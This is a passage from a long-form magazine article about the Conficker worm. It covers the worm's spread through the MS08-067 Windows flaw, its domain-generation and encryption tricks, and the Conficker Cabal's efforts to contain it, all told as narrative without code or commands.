worm had originated. Overnight, it was everywhere. And on closer inspection, it became
clear that voracity was just the first of its remarkable traits. 
&lt;/p&gt;
&lt;p&gt;
Various labs assigned names to the worm. It was dubbed “Downadup” and “Kido,” but
the name that stuck was “Conficker,” which it was given after it tried to contact
a fake security Web site, trafficconverter.biz. Microsoft security programmers shuffled
the letters and came up with &lt;i&gt;Conficker&lt;/i&gt;, which stuck partly because &lt;i&gt;ficker&lt;/i&gt; is
German slang for “motherfucker,” and the worm was certainly that. At the same time
that Conficker was spewing into honeypots, it was quietly slipping into personal computers
worldwide—an estimated 500,000 in the first month. 
&lt;/p&gt;
&lt;p&gt;
Why? What was its purpose? What was it telling all those computers to do? 
&lt;/p&gt;
&lt;p&gt;
Imagine your computer to be a big spaceship, like the starship &lt;i&gt;Enterprise&lt;/i&gt; on &lt;i&gt;Star
Trek&lt;/i&gt;. The ship is so complex and sophisticated that even an experienced commander
like Captain James T. Kirk has only a general sense of how every facet of it works.
From his wide swivel chair on the bridge, he can order it to fly, maneuver, and fight,
but he cannot fully comprehend all its inner workings. The ship contains many complex,
interrelated systems, each with its own function and history—systems for, say, guidance,
maneuvers, power, air and water, communications, temperature control, weapons, defensive
measures, etc. Each system has its own operator, performing routine maintenance, exchanging
information, making fine adjustments, keeping it running or ready. When idling or
cruising, the ship essentially runs itself without a word from Captain Kirk. It obeys
when he issues a command, and then returns to its latent mode, busily doing its own
thing until the next time it is needed. 
&lt;/p&gt;
&lt;p&gt;
Now imagine a clever invader, an enemy infiltrator, who &lt;i&gt;does&lt;/i&gt; understand the
inner workings of the ship. He knows it well enough to find a portal with a broken
lock overlooked by the ship’s otherwise vigilant defenses—like, say, a flaw in Microsoft’s
operating platform. So no one notices when he slips in. He trips no alarm, and then,
to prevent another clever invader from exploiting the same weakness, he repairs the
broken lock and seals the portal shut behind him. He &lt;i&gt;improves&lt;/i&gt; the ship’s defenses.
Ensconced securely inside, he silently sets himself up as the ship’s alternate commander.
He enlists the various operating functions of the ship to do his bidding, careful
to avoid tripping any alarms. Captain Kirk is still up on the bridge in his swivel
chair with the magnificent instrument arrays, unaware that he now has a rival in the
depths of his ship. The &lt;i&gt;Enterprise&lt;/i&gt; continues to perform as it always has. Meanwhile,
the invader begins surreptitiously communicating with his own distant commander, letting
him know that he is in position and ready, waiting for instructions. 
&lt;/p&gt;
&lt;p&gt;
And now imagine a vast fleet, in which the &lt;i&gt;Enterprise&lt;/i&gt; is only one ship among
millions, all of them infiltrated in exactly the same way, each ship with its hidden
pilot, ever alert to an outside command. In the real world, this infiltrated fleet
is called a “botnet,” a network of infected, “robot” computers. The first job of a
worm like Conficker is to infect and link together as many computers as possible—the
phenomenon witnessed by Porras and other security geeks in their honeypots. Thousands
of botnets exist, most of them relatively small—a few thousand or a few tens of thousands
of infected computers. More than a billion computers are in use around the world,
and by some estimates, a fourth of them have been surreptitiously linked to a botnet.
But few botnets approach the size and menace of the one created by Conficker, which
has stealthily linked between 6 million and 7 million computers. 
&lt;/p&gt;
&lt;p&gt;
Once created, botnets are valuable tools for criminal enterprise. Among other things,
they can be used to efficiently distribute malware, to steal private information from
otherwise secure Web sites or computers, to assist in fraudulent schemes, or to launch
denial-of-service attacks—overwhelming a target computer with a flood of requests
for response. The creator of an effective botnet, one with a wide range and the staying
power to defeat security measures, can use it himself for one of the above scams,
or he can sell or lease it to people who specialize in exploiting botnets. (Botnets
can be bought or leased in underground markets online.) 
&lt;/p&gt;
&lt;p&gt;
Beyond criminal enterprise, botnets are also potentially dangerous weapons. If the
right order were given, and all these computers worked together in one concerted effort,
a botnet with that much computing power could crack many codes, break into and plunder
just about any protected database in the world, and potentially hobble or even destroy
almost any computer network, including those that make up a country’s vital modern
infrastructure: systems that control banking, telephones, energy flow, air traffic,
health-care information—even the Internet itself. 
&lt;/p&gt;
&lt;p&gt;
The key word there is &lt;i&gt;could&lt;/i&gt;, because so far Conficker has done none of those
things. It has been activated only once, to perform a relatively mundane spamming
operation—enough to demonstrate that it is not benign. No one knows who created it.
No one yet fully understands how it works. No one knows how to stop it or kill it.
And no one even knows for sure &lt;i&gt;why&lt;/i&gt; it exists. 
&lt;/p&gt;
&lt;p&gt;
If yours is one of the infected machines, you are like Captain Kirk, seemingly in
full command of your ship, unaware that you have a hidden rival, or that you are part
of this vast robot fleet. The worm inside your machine is not idle. It is stealthily
running, issuing small maintenance commands, working to protect itself from being
discovered and removed, biding its time, and periodically checking in with its command-and-control
center. Conficker has taken over a large part of our digital world, and so far most
people haven’t even noticed. 
&lt;/p&gt;
&lt;p&gt;
The struggle against this remarkable worm is a sort of chess match unfolding in the
esoteric world of computer security. It pits the cleverest attackers in the world,
the bad guys, against the cleverest defenders in the world, the good guys (who have
been dubbed the “Conficker Cabal”). It has prompted the first truly concerted global
effort to kill a computer virus, extraordinary feats of international cooperation,
and the deployment of state-of-the-art decryption techniques—moves and countermoves
at the highest level of programming. The good guys have gone to unprecedented lengths,
and have had successes beyond anything they would have thought possible when they
started. But a year and a half into the battle, here’s the bottom line: 
&lt;/p&gt;
&lt;p&gt;
The worm is winning. 
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;A Digital Sam Spade &lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
Twenty years ago, computers were bedeviled by hackers. These were savvy outlaws who
used their deep knowledge of operating systems to invade, steal, and destroy, or sometimes
just to tap into secure facilities and show off their skills. Hackers became heroes
to a generation of teenagers, and had all sorts of motives, but their most distinctive
trait was a tendency to show off. 
&lt;/p&gt;
&lt;p&gt;
Some had truly malicious intent. In his 1989 best seller, &lt;i&gt;&lt;a href="http://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/0743411463"&gt;The
Cuckoo’s Egg&lt;/a&gt;&lt;/i&gt;, Cliff Stoll told the story of his stubborn, virtually single-handed
hunt for an elusive hacker in Germany who was using Stoll’s computer system at the
Lawrence Berkeley National Laboratory as a portal to Defense Department computers.
For many people, Stoll’s book was the introduction to the netherworld of rarefied
gamesmanship that defines computer security. Stoll’s hacker never penetrated the most
secret corners of the national-security net, and even relatively serious breaches
like the one Stoll described were more nuisance than threat. But the individual hacker
working as a spy or vandal has evolved into something more organized and menacing. 
&lt;/p&gt;
&lt;p&gt;
Andre’ M. DiMino, a computer sleuth who is part of the Conficker Cabal, is considered
one of the world’s foremost authorities on botnets. He stumbled into his avocation
on a Monday morning a decade ago, when he discovered that over the weekend, someone
had broken into the computer system he was administering for a small company in New
Jersey. DiMino has an undergraduate degree in electrical engineering with an emphasis
in computer science, but he has mostly taught himself up to his present level of expertise,
which is extreme. At 45, he is a slender, affable idealist who keeps a small array
of computers in an upstairs bedroom. When I stopped by to talk to him, he baked me
pizza. His day job is doing computer forensics for law enforcement in Bergen County,
New Jersey, but he has a kind of alter ego as what he calls a “botnet hunter.” 
&lt;/p&gt;
&lt;p&gt;
Back when he discovered the weekend break-in, DiMino assumed at first that it was
the work of a hacker, a vandal, or possibly a former employee, only to discover, based
on an analysis of the IP (Internet Protocol) addresses of the incoming data, that
his little computer network had been invaded by someone from Turkey or Ukraine. What
would someone halfway around the planet want with the computer system of a small business-management
firm in a New Jersey office park? Apparently, judging by what he found, his invader
was in the business of selling pirated software, movies, and music. Needing large
amounts of digital storage space to hide stolen inventory, the culprit seemed to have
conducted an automated search over the Internet, looking worldwide for vulnerable
systems with large amounts of unused disc space—DiMino equates it to walking around
rattling doorknobs, looking for one door left unlocked. DiMino’s system fit the bill,
so the crooks had dumped a huge bloc of data onto his discs. He erased the stash and
locked the door that had allowed the pirates in. As far as the company was concerned,
that solved the problem. No harm done. No need to call the police or investigate further. 
&lt;/p&gt;
&lt;p&gt;
But DiMino was intrigued. He reviewed the server logs for previous weeks and saw that
this successful invasion was one of many such efforts. Other attackers had been rattling
the doors of his network, looking for vulnerabilities. If there were bad guys actively
exploiting other people’s computers all over the world, designing sophisticated programs
to exploit weaknesses … how cool was that? And who was trying to stop them? 
&lt;/p&gt;
&lt;p&gt;
DiMino set about educating himself on the fine points of this obscure battle of wits.
He eventually co-founded the &lt;a href="http://www.shadowserver.org/"&gt;Shadowserver Foundation&lt;/a&gt;,
a nonprofit partnership of defense-minded geeks at war with malware, effectively transforming
himself into a digital Sam Spade—indeed, the graphic atop Shadowserver’s home page
features a &lt;a href="http://en.wikipedia.org/wiki/Dashiell_Hammett"&gt;Dashiell Hammett&lt;/a&gt;–style
detective emerging from shadow. 
&lt;/p&gt;
&lt;p&gt;
Both sides in this cyberwar have become astonishingly sophisticated, operating at
the cutting edge of programming theory and cryptography. Both understand the limits
of security methodology, the one side working to broaden its reach, the other working
to surpass it. Because malware has been automated, the good guys usually can only
guess at who they are up against. 
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Trojans, Viruses, and Worms &lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
Rodney Joffe heads the cabal that has been battling Conficker. He is a burly, garrulous
South African–born American who serves as senior vice president and chief technologist
for &lt;a href="http://www.neustar.biz/"&gt;Neustar&lt;/a&gt;, a company that provides trunk-line
service for competing cell-phone companies around the world. Joffe’s interest in stopping
the worm did not stem just from his outrage and sense of justice. His concern for
Neustar’s operation is professional, and illustrative. 
&lt;/p&gt;
&lt;p&gt;
The company runs a huge local-number-portability database. Almost every phone call
in North America, before it’s completed, must ask Neustar where to go. Back in the
old days, when the phone company was a monopoly, telecommunications were relatively
simple. You could figure out where a phone call was going, right down to the building
where the target phone would ring, just by looking at the number. Today we have competing
telephone companies, and cell phones, and a person’s telephone number is no longer
necessarily tied to a geographic location. In this more complex world, someone needs
to keep track of every single phone number, and know where to route calls so they
end up in the right place. Neustar performs this service for telephone calls, and
is one of many registries that oversee high-level Internet domains. It is, in Joffe’s
words, “the map.” 
&lt;/p&gt;
&lt;p&gt;
“If I disappear, there’s no map,” he says. “So if you take us down, whole countries
can actually disappear from the grid. They’re connected, but no one can find their
way there, because the map’s disappeared.” 
&lt;/p&gt;
&lt;p&gt;
A botnet like Conficker could theoretically be used to shut down Neustar’s system.
So Joffe helped form the Conficker Cabal. He scoffed when he read in late 2009 that
the Obama administration’s Department of Homeland Security planned to hire “a thousand”
computer-security experts over the next three years. “There aren’t more than a few
hundred people in the world who understand this stuff.” 
&lt;/p&gt;
&lt;p&gt;
Most of us use the word &lt;i&gt;virus&lt;/i&gt; to describe all malware, but in geekspeak, it
means something more specific. There are three types of the stuff: Trojans, viruses,
and worms. A Trojan is a piece of software that works like a Trojan horse, masquerading
as one thing to get inside a computer, and then attacking. A virus attacks the host
computer after slipping in through a hole in its operating system. It depends on the
computer-operator—you—doing something stupid to activate it, like opening an attachment
to an e-mail that appears innocuous, or clicking on an enticing link. A worm works
like a virus, exploiting flaws in operating systems, but it doesn’t attack once it
breaks in. It generally doesn’t have a malicious payload. Exactly like the most-sophisticated
viruses in the biological world, it does not cripple or kill its host. It is primarily
designed to spread. The instructions that will put a worm like Conficker to work are
not embedded in its code; they will be delivered later, from a remote command center. 
&lt;/p&gt;
&lt;p&gt;
In the old days, when your computer got infected, it slowed down because your commands
had to compete for processing with viral invaders. You knew something was wrong because
the machine took 10 times longer to boot up, or there was a delay between command
and response. You began to get annoying pop-ups on your screen directing you to download
supposedly remedial software. Programs would freeze. In this sense, the old malware
was like the Ebola virus, a very scary strain that messily kills nearly everyone it
infects—which is another way of saying that it is grossly ineffective, because it
burns out the very host organisms it needs to survive. The miscreants who created
computer viruses years ago learned that malware that announces itself in these ways
doesn’t last. 
&lt;/p&gt;
&lt;p&gt;
So today’s malware produces no pop-ups, no slowdowns. A worm is especially quiet,
since all it does, at least initially, is spread. Conficker stealthily sets up shop
without making a ripple, and—other than calling home periodically for instructions—just
waits. Its regular messages to its command center amount to only a couple hundred
bytes of data, which is not enough to even light up the little bulb that flashes when
a computer hard drive is at work. 
&lt;/p&gt;
&lt;p&gt;
After Phil Porras and others began snaring Conficker in increasing numbers, they began
dissecting it. The worm itself was exquisite. It consisted of only a few hundred lines
of code, no more than 35 kilobytes—slightly smaller than a 2,000-word document. In
comparison, the average home computer today has anywhere from 40 to 200 &lt;i&gt;gigabytes&lt;/i&gt; of
storage. Unless you were looking for it, unless you knew &lt;i&gt;how&lt;/i&gt; to look for it,
you would never see it. Conficker drifts in like a mote. 
&lt;/p&gt;
&lt;p&gt;
It exploited a specific hole, Port 445, in the Microsoft operating systems, a vulnerability
that the manufacturer had tried to repair just weeks earlier. Ports are designated
“listening” points in a system, designed to transmit and receive particular kinds
of data. There are many of them, more than 65,000, because an operating system consists
of layer upon layer of functions. A firewall is a security program that guards these
ports, controlling the flow of data in and out. Some ports, like the one that handles
e-mail, are heavily trafficked. Most are not; they listen for updates and instructions
that deal with a narrow and specific function, usually routine procedures that never
rise to the notice of computer-users. Only certain very specific kinds of data can
flow through ports, and then only with the appropriate codes. Windows opens Port 445
by default to perform tasks like issuing instructions for print-sharing or file-sharing.
Late in the summer of 2008, Microsoft learned that even a system protected by a firewall
was vulnerable at Port 445 if print-sharing and file-sharing were enabled (which they
were on many computers). In other words, even a well-protected computer had a hole.
On October 23, 2008, the company issued a rare “critical security bulletin” (&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx"&gt;MS08-067&lt;/a&gt;)
with a patch to repair that hole. A specially crafted “remote procedure call” could
allow the port to be used by a remote operator, the security bulletin warned, and
“an attacker could exploit this vulnerability without authentication to run arbitrary
code.” The patch Microsoft offered theoretically slammed the door on a worm like Conficker
almost a month before it appeared. 
&lt;/p&gt;
&lt;p&gt;
Theoretically. 
&lt;/p&gt;
&lt;p&gt;
In fact, the bulletin itself may have inspired the creation of Conficker. Many, many
computer-operators worldwide—you know who you are—fail to diligently heed security
updates. And the patches are issued only to computers with validated software installations;
millions of computers run on bootlegged operating systems, which have never been validated.
Microsoft issues its updates on the second Tuesday of every month. Every geek in the
world knows this; it’s called “Patch Tuesday.” The company employs some of the best
programmers in the world to stay one step ahead of the bad guys. If everyone applied
the new patches promptly, Windows would be nigh impregnable. But because so many people
fail to apply the patches promptly, and because so many machines run on illegitimate
Windows systems, Patch Tuesday has become part of Microsoft’s problem. The company
points out its own vulnerabilities, which is like a general responsible for defending
a fort making a public announcement—“The back door to the supply shed in the southeast
corner of the garrison has a broken lock; here’s how to fix it.” When there is only
one fort, and it is well policed, the lock is fixed and the vulnerability disappears.
But when you are defending millions of forts, and a goodly number of the people responsible
for their security snooze right through Patch Tuesday, the security bulletin doesn’t
just invite attack, it provides a map! Twenty-eight days after the MS08-067 security
bulletin appeared, Conficker started worming its way into unpatched computers. 
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;The Cabal’s Sandboxes &lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
Conficker’s rate of replication got everyone’s attention, so a loose-knit gaggle of
geeky “good guys,” including Porras, Joffe, and DiMino, began picking the worm apart.
The online-security community consists of software manufacturers like Microsoft, companies
like Symantec that sell security packages to computer owners, large telecommunication
registries like Neustar and VeriSign, nonprofit research centers like SRI International,
and botnet hunters like Shadowserver. In addition to maintaining honeypots, these
security experts operate “sandboxes”—isolated computers (or, again, virtual computers
inside larger ones) where they can place a piece of malware, turn it on, and watch
it run. In other words, where they can play with it. 
&lt;/p&gt;
&lt;p&gt;
They all started playing with Conficker, comparing notes on what they found, and brainstorming
ways to defeat it. That’s when someone dubbed the group the “Conficker Cabal,” and
the name stuck, despite discomfort with the darker implications of the word. Here
are some of the things the cabal discovered about the worm in those first few weeks: 
&lt;/p&gt;
&lt;blockquote&gt;• It patched the hole it came through at Port 445, making sure it would
not have to compete with other worms. This was smart, because surely other hackers
had seen security bulletin MS08-067. 
&lt;br /&gt;
• It tried to prevent communication with security providers (many computer-users subscribe
to commercial services that regularly update antivirus software). 
&lt;br /&gt;
• When it started, if the IP address of the infected computer was Ukrainian, the worm
self-destructed. When in attack mode, searching for other computers to infect, it
skipped any with a Ukrainian IP address. 
&lt;br /&gt;
• It disabled the Windows “system restore” points, a useful tool that allows users
with little expertise to simply reset an infected machine to a date prior to its infection.
(System restore is one of the easiest ways to debug a machine.) &lt;/blockquote&gt; 
&lt;p&gt;
All of these things were clever. They indicated that Conficker’s creator was up on
all the latest tricks. But the main feature that intrigued the cabal was the way the
worm called home. This is, of course, what worms designed to create botnets do. They
settle in and periodically contact a command center to receive instructions. Botnet
hunters like DiMino regularly wipe out whole malicious networks by deciphering the
domain name of the command center and then getting it blocked. In the old days, this
was easier because malware pointed to only a few IP addresses, which could be blocked
by hosting providers and Internet service providers. The newer worms like Conficker
bumped the game up to a higher level, generating domain names that involve many providers
and a wide range of IP addresses, and that security experts can block only by contacting
Internet registries—organizations that manage the domain registrations for their realm.
But Conficker did not call home to a fixed address. 
&lt;/p&gt;
&lt;p&gt;
Shortly after it was discovered, the worm began performing a new operation: generating
a list of domain names seemingly at random, 250 a day across five top-level domains
(top-level domains are defined by the final letters in a Web address, such as &lt;i&gt;.com&lt;/i&gt; or &lt;i&gt;.edu&lt;/i&gt; or &lt;i&gt;.uk&lt;/i&gt;).
The worm would then go down the list until it hit upon the one connected to its remote
controller’s server. All Conficker’s controller had to do was register one of the
addresses, which can be done for a fee of about $10, and await the worm’s regular
calls. If he wished, he could issue instructions. It was as if the boss of a crime
family told his henchmen to check in daily by turning to the bottom of a certain page
in each day’s &lt;i&gt;Racing Form&lt;/i&gt;, where there would be a list of potential numbers.
They would then call each number until the boss picked up. So it was not apparent
from day to day where the worm would call home. 
&lt;/p&gt;
&lt;p&gt;
With the &lt;i&gt;Racing Form&lt;/i&gt; trick, if you were a cop and were tipped off where to
look, you might arrange with the paper’s publisher to see the page before it was printed,
and thus be one step ahead of the henchmen and their boss. To defeat Conficker, the
geeks would have to figure out in advance what the numbers (or, in this case, domain
names) would be, and then hustle to either buy up or contact every one, block it,
or cajole whoever owned it to cooperate before the worm “made the call.” 
&lt;/p&gt;
&lt;p&gt;
Michael Ligh, a young Brooklyn researcher employed by the computer-security company
iDefense, is one of several people who went to work unraveling Conficker’s methods.
Ligh and others had seen algorithms for random-domain-name generation before, and
most were keyed to the infected computer’s clock. If new places to call home must
be generated every day, or every few hours, then the worm needs to know when to perform
the procedure. So the malware simply checks the time on its host computer. This provided
the good guys with a tool to defeat it. They turned the clock forward on their sandbox
computer, forcing their captured strain of the worm to spit out all the domain names
it would generate for as long into the future as they cared to look. It was like stealing
the teacher’s edition of a classroom textbook, the one with all the answers to the
quizzes and tests printed in the back. Once you knew all the places the malware would
be calling, you could cordon off those sites in advance, effectively stranding the
worm. 
&lt;/p&gt;
&lt;p&gt;
Conficker had an answer for that. Instead of using the infected computer’s clock,
the worm set its schedule by the time on popular corporate home pages, like Yahoo,
Google, or Microsoft’s own msn.com. 
&lt;/p&gt;
&lt;p&gt;
“&lt;i&gt;That&lt;/i&gt; was interesting,” Ligh said. “There was no way we could turn the clock
forward on Google’s home page.” 
&lt;/p&gt;
&lt;p&gt;
So there was no easy way to predict the list of domain names in advance. But there
was &lt;i&gt;a&lt;/i&gt; way. The first step was to set up a proxy server to, in effect, intercept
the time update from the big corporate Web site before it got back to the worm, alter
the information, and then send it on. You could then tell the worm it was a date sometime
in the future, and the worm would spit out the domain names for that date. This was
a tedious way to proceed, since you could generate only one set of new domain names
at a time. So Ligh and other researchers reverse-engineered the worm’s algorithm,
extracted the time-update function, and wedded it to a piece of code they could control.
They instructed their copy to generate the future lists in advance. They could then
buy up or block all the sites, and direct all the worm’s communications into a “sinkhole,”
a dead-end location where calls go unanswered. Conficker’s creators had deliberately
made the task so onerous and expensive that &lt;i&gt;no one&lt;/i&gt; would go to the trouble
of blocking all possible command centers. 
&lt;/p&gt;
&lt;p&gt;
Or so they thought. The cabal, through a determined and unprecedented effort, did
manage to cordon off the worm. By the end of 2008, Conficker had infected an estimated
1.5 million machines worldwide, but it was on its way to full containment. In the
great chess match, the good guys had called “Check!” 
&lt;/p&gt;
&lt;p&gt;
Then the worm turned. 
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;MD-6 &lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
On December 29, 2008, a new version of Conficker showed up, and if the geeks had been
intrigued with the original version, they now experienced something more akin to respect
… mingled with fear. 
&lt;/p&gt;
&lt;p&gt;
One of the early theories about the worm was that it had slipped out of a computer-science
lab, the product of some fooling-around by a sophisticated graduate student or group
of students. They had loosed it on the world inadvertently, or maybe on purpose as
a prank or experiment without realizing how effective it would be. This hypothesis
appealed to optimists. 
&lt;/p&gt;
&lt;p&gt;
The new version of the worm, Conficker B, exploded the benevolent-accident theory.
It was clear that the worm’s creator had been watching every move the good guys made,
and was adjusting accordingly. He didn’t care that the good guys could predict its
upcoming lists of domain names. He just rejiggered the worm to spread the new lists
out over eight top-level domains instead of five, making the job of blocking them
far more difficult. The worm had no trouble contacting all of these locations. If
it received no command from one, it simply tried the next one on its list. Conficker
B could go on like this for months, even years. It had to find its controller only
once to receive instructions. 
&lt;/p&gt;
&lt;p&gt;
“That’s a high number,” Rodney Joffe, of Neustar, told me. “The cops will get sick
and tired of knocking on 250 doors a day and finding there’s no one there. And if
I’m the chief bad guy, all I have to do is be behind one of those doors on one of
those days.” 
&lt;/p&gt;
&lt;p&gt;
There were other improvements to Conficker. Among them: besides shutting down whatever
security system was installed on the computer it invaded, and preventing it from communicating
with computer-security Web sites, it stopped the computer from connecting with Microsoft
to perform Windows updates. So even though Microsoft was providing patches, the infected
machines could not get to them. In addition, it modified the computer’s bandwidth
settings to increase speed and propagate itself faster; and it began to spread itself
in different ways, including via USB drives. This last innovation meant that even
“closed” computer networks, those with no connection to the Internet, were vulnerable,
since users who cannot readily transmit files from point to point via the Web often
store and transport them on small USB drives. If one of those USB drives, or a CD,
was plugged into an infected computer, it could deliver the worm to an entire closed
network. 
&lt;/p&gt;
&lt;p&gt;
All of this was impressive—but something else stopped researchers cold. Analysts with
Conficker B isolated in their sandboxes could watch it regularly call home and receive
a return message. The exchange was in code, and not just any code. 
&lt;/p&gt;
&lt;p&gt;
Breaking codes used to be the province of clever puzzle masters, who during World
War II devised encryption and code-breaking methods so difficult that operators needed
machines to do the work. Computers today can perform so many calculations so fast
that, theoretically at least, no cipher is too difficult to crack. One simply applies
what computer scientists call “brute force”: trying every possible combination systematically
until the secret is revealed. The game is to make a cipher so difficult that the amount
of computing power needed to break it renders the effort pointless—the “thief” would
have to spend more to obtain the prize than the prize is worth. In his 1999 history
of code-making and -breaking, &lt;i&gt;&lt;a href="http://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323"&gt;The
Code Book&lt;/a&gt;&lt;/i&gt;, Simon Singh wrote: “It is now routine to encrypt a message [so
securely] that all the computers on the planet would need longer than the age of the
universe to break the cipher.” 
&lt;/p&gt;
&lt;p&gt;
The basis for the highest-level modern ciphers is a public-key encryption method invented
in 1977 by three researchers at MIT: Ron Rivest (the primary author), Adi Shamir,
and Leonard Adleman. In the more than 30 years since it was devised, the method has
been improved several times. The National Institute of Standards and Technology sets
the &lt;a href="http://www.itl.nist.gov/fipspubs/"&gt;Federal Information Processing Standard&lt;/a&gt;,
which defines the cryptography algorithms that government agencies must use to protect
communications. Because it is the most sophisticated oversight effort of its kind,
the standard is determined by an international competition among the world’s top cryptologists,
with the winning entry becoming by default the worldwide standard. The current highest-level
standard is labeled SHA-2 (Secure Hash Algorithm–2). Both this and the first SHA standard
are versions of Rivest’s method. The international competition to upgrade SHA-2 has
been under way for several years and is tentatively scheduled to conclude in 2013,
at which point the new standard will become SHA-3. 
&lt;/p&gt;
&lt;p&gt;
Rivest’s proposal for the new standard, MD-6 (Message Digest–6), was submitted in
the fall of 2008, about a month before Conficker first appeared, and began undergoing
rigorous peer review—the very small community of high-level cryptographers worldwide
began testing it for flaws. 
&lt;/p&gt;
&lt;p&gt;
Needless to say, this is a very arcane game. The entries are comprehensible to very
few people. According to Rodney Joffe, “Unless you’re a subject-matter expert actively
involved in crypto-algorithms, you didn’t even know that MD-6 existed. It wasn’t like
it was put in &lt;i&gt;The &lt;/i&gt;&lt;i&gt;New York Times&lt;/i&gt;.” 
&lt;/p&gt;
&lt;p&gt;
So when the new version of Conficker appeared, and its new method of encrypting its
communication employed MD-6, Rivest’s &lt;i&gt;proposal&lt;/i&gt; for SHA-3, the cabal’s collective
mind was blown. 
&lt;/p&gt;
&lt;p&gt;
“It was clear that these guys were not your average high-school kids or hackers or
predominantly lazy,” Joffe told me. “They were making use of some very, very sophisticated
techniques. 
&lt;/p&gt;
&lt;p&gt;
“Not only are we not dealing with amateurs, we are possibly dealing with people who
are superior to all of our skills in crypto,” he said. “If there’s a surgeon out there
who’s the world’s foremost expert on treating retinitis pigmentosa, he doesn’t do
bunions. The guy who is the world expert on bunions—and, let’s say, bunions on the
third digit of Anglo-American males between the ages of 35 and 40, that are different
than anything else—he doesn’t do surgery for retinitis pigmentosa. The knowledge it
took to employ Rivest’s proposal for SHA-3 demonstrated a similarly high level of
specialization. We found an equivalent of three or four of those in the code—different
parts of it. 
&lt;/p&gt;
&lt;p&gt;
“Take Windows,” he explained. “The understanding of Windows’ operating system, and
how it worked in the kernel, needed that kind of a domain expert, and they had that
kind of ability there. And we realized as a community that we were not dealing with
something normal. We’re dealing with one of two things: either we’re dealing with
incredibly sophisticated cyber criminals, or we’re dealing with a group that was funded
by a nation-state. Because this wasn’t the kind of team that you could just assemble
by getting your five buddies who play Xbox 360 and saying, ‘Let’s all work together
and see what we can do.’” 
&lt;/p&gt;
&lt;p&gt;
The plot thickened—it turned out that Rivest’s proposal, MD-6, had a flaw. Cryptologists
in the competition had duly gone to work trying to crack the code, and one had succeeded.
In early 2009, Rivest quietly withdrew his proposal, corrected it, and resubmitted
it. This gave the cabal an opening. If the original Rivest proposal was flawed, then
so was the encryption method for Conficker B. If they were able to eavesdrop on communications
between Conficker and its mysterious controller, they might be able to figure out
who he was, or who they were. How likely was it that the creator of Conficker would
know about the flaw discovered in MD-6? 
&lt;/p&gt;
&lt;p&gt;
Once again, the good guys had the bad guys in check. 
&lt;/p&gt;
&lt;p&gt;
About six weeks later, another new version of the worm appeared. 
&lt;/p&gt;
&lt;p&gt;
It employed Rivest’s &lt;i&gt;revised&lt;/i&gt; MD-6 proposal. 
&lt;/p&gt;
&lt;p&gt;
Game on. 
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;“Our Finest Hour” &lt;/b&gt;
&lt;/p&gt;
&lt;p&gt;
By early 2009, Conficker B had infected millions of machines. It had invaded the United
Kingdom’s Defense Ministry. As CBS prepared a &lt;i&gt;&lt;a href="http://www.cbsnews.com/stories/2009/03/27/60minutes/main4897053.shtml"&gt;60
Minutes&lt;/a&gt;&lt;/i&gt;&lt;a href="http://www.cbsnews.com/stories/2009/03/27/60minutes/main4897053.shtml"&gt; segment
on the worm&lt;/a&gt;, its computers were struck. In both instances, security experts scrambled
to uproot the invader, badly disrupting normal functioning of the system. Conficker
now had the world’s attention. In February 2009, the cabal became more formal. Headed
initially by a Microsoft program manager, and eventually by Joffe, it became the Conficker
Working Group. Microsoft offered a $250,000 bounty for the arrest and conviction of
the worm’s creators. 
&lt;/p&gt;
&lt;p&gt;
The newly named team went to work trying to corral Conficker B. Getting rid of it
was out of the question. Even though they could scrub it from an infected computer,
there was no way they could scrub it from all infected computers. The millions of
machines in the botnet were spread all over the world, and most users of infected
ones didn’t even know it. It was theoretically feasible to unleash a counter-worm,
something to surreptitiously enter computers and take out Conficker, but in free countries,
privacy laws frown on invading people’s home computers. Even if all the governments
got together to allow a massive attack on Conficker—an unlikely event—the new version
of the worm had new ways of evading the threat. 
&lt;/p&gt;
&lt;p&gt;
Conficker C appeared in March 2009, and in addition to being impressed by its very
snazzy crypto, the Conficker Working Group noticed that the new worm’s code threatened
to up the number of domain names generated every day to 50,000. The new version would
begin generating that many domain names daily on April 1. At the same time, all computers
infected with the old variants of Conficker that could be reached would be updated
with this new strain. The move suggested that the bad guys behind Conficker understood
not just cryptology, but also the mostly volunteer nature of the cabal. 
&lt;/p&gt;
&lt;p&gt;
“You know you’re dealing with someone who not only knows how botnets work, but who
understands how the security community works,” Andre’ DiMino told me. “This is not
just a bunch of organized criminals that, say, commission someone to write a botnet
for them. They know the challenges that the security community faces internally, politically,
and economically, and are exploiting them as well.” 
&lt;/p&gt;
&lt;p&gt;
The bad guys knew, for instance, that preregistering even 250 domain names a day at
$10 a pop was doable for the good guys. As long as the number remained relatively
small, the cabal could stay ahead of them. But how could the good guys cope with a
daily flood of 50,000? It would require an unprecedented degree of cooperation among
competing security firms, software manufacturers, nonprofit organizations like Shadowserver,
academics, and law enforcement. 
&lt;/p&gt;
&lt;p&gt;
“You can’t just register all 50,000—you’ve got to go one by one and make sure the
domain name doesn’t already exist,” Joffe says. “And if it exists, you’ve got to make
sure that it belongs to a good guy, not a bad guy. You’ve got to make a damn phone
call for any of the new ones, and have to send someone out there to do it—and these
are spread all over the world, including some very remote places, Third World countries.
Now the bar had been raised to a level that was almost insurmountable.” 
&lt;/p&gt;
&lt;p&gt;
The worm was already running rings around the good guys, and then, just for good measure,
it planted a pie in their faces on, of all days, April 1. By playing with the new
variant in their sandboxes, the cabal knew that the enhanced domain-name-generating
algorithm would click in on that day. If the update succeeded, it would be a game-changer.
It was the most dramatic moment since Conficker had surfaced the previous November.
Apparently, at long last, this extraordinary tool was going to be put to use. But
for what? The potential was scary. Few people outside the upper echelon of computer
security even understood what Conficker was, much less what was at stake on April
1, but word of a vague impending digital doomsday spread. The popular press got hold
of it. There were headlines and the usual spate of ill-informed reports on cable TV
and the Internet. When the day arrived, those who had been warning about the dangers
of this new worm were sure to see their fears vindicated. 
&lt;/p&gt;
&lt;p&gt;
The cabal mounted a heroic effort to shut down the worm’s potential command centers
in advance of the update, coordinating directly with the Internet Corporation for
